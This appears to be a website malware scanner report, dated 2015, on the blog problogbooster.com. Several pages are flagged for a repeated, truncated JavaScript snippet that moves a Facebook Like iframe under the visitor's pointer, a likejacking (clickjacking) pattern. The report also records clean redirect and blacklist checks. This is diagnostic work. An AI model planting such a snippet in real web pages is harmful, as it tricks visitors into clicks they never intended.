Scanned pages/files
Request | Server response | Status |
http://www.problogbooster.com/2013/08/unfortunately-touchwiz-home-has-stopped.html | 200 OK Content-Length: 224896 Content-Type: text/html | malicious |
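Malicious code - confirmed by antiviruses (see below). The scanner's excerpt is cut off partway through the `lbox.scrolling` assignment, so the code between that point and `function mouseMove` is missing. The visible part creates an iframe holding the Facebook Like plugin for the site's own Facebook page, and `mouseMove` repositions that iframe under the pointer on every mouse movement. This is the pattern usually called likejacking (a form of clickjacking), where a click anywhere on the page can land on the Like button without the visitor intending it; whatever styling hides the frame is not visible in this excerpt. The same excerpt is reported on every flagged page, including the 404 responses, so it most likely sits in the shared site template rather than in individual posts.
(function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })();
Antivirus reports: (no entries are listed in this capture)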
| ||
http://www.problogbooster.com//pagead2.googlesyndication.com/pagead/show_ads.js/ | 404 Not Found Content-Length: 213877 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js | 200 OK Content-Length: 28331 Content-Type: text/javascript | clean |
https://www.blogger.com/static/v1/widgets/3512243057-widgets.js | 200 OK Content-Length: 90257 Content-Type: text/javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12850 Content-Type: application/javascript | clean |
http://www.problogbooster.com/ | 200 OK Content-Length: 280061 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://contextual.media.net/nmedianet.js?cid=8CUCTYKUQ | 200 OK Content-Length: 68516 Content-Type: text/javascript | clean |
http://www.problogbooster.com/search/label/How%20to | 200 OK Content-Length: 302606 Content-Type: text/html | clean |
http://www.problogbooster.com/search/label/Facebook | 200 OK Content-Length: 274699 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://www.problogbooster.com/2008/10/contact-me.html | 200 OK Content-Length: 221854 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://www.problogbooster.com/2008/10/ | 200 OK Content-Length: 206009 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://www.problogbooster.com/feeds/posts/default | HTTP/1.1 302 Moved Temporarily Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1 Connection: close Date: Tue, 17 Feb 2015 14:11:37 GMT Accept-Ranges: none Location: http://feeds.feedburner.com/problogbooster Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Tue, 17 Feb 2015 14:11:38 GMT Alternate-Protocol: 80:quic,p=0.08,80:quic,p=0.08 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://feeds.feedburner.com/problogbooster | 200 OK Content-Length: 239169 Content-Type: text/xml | clean |
http://feeds.feedburner.com/test404page.js | 404 Not Found Content-Length: 1818 Content-Type: text/html | clean |
http://www.problogbooster.com//www.blogger.com/rearrange?blogID=4537507592189321213&widgetType=HTML&widgetId=HTML17&action=editWidget&sectionId=sidebar/ | 404 Not Found Content-Length: 214302 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://www.problogbooster.com/search/label/Blogging%20Tips | 200 OK Content-Length: 300647 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: problogbooster.com
Result:
GET / HTTP/1.1
Host: problogbooster.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: problogbooster.com
Referer: http://www.google.com/search?q=problogbooster.com
Result:
The result is similar to the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: problogbooster.com
Referer: http://www.google.com/search?q=problogbooster.com
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=problogbooster.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://problogbooster.com/
Result: problogbooster.com is not infected or malware details are not published yet.
Result: problogbooster.com is not infected or malware details are not published yet.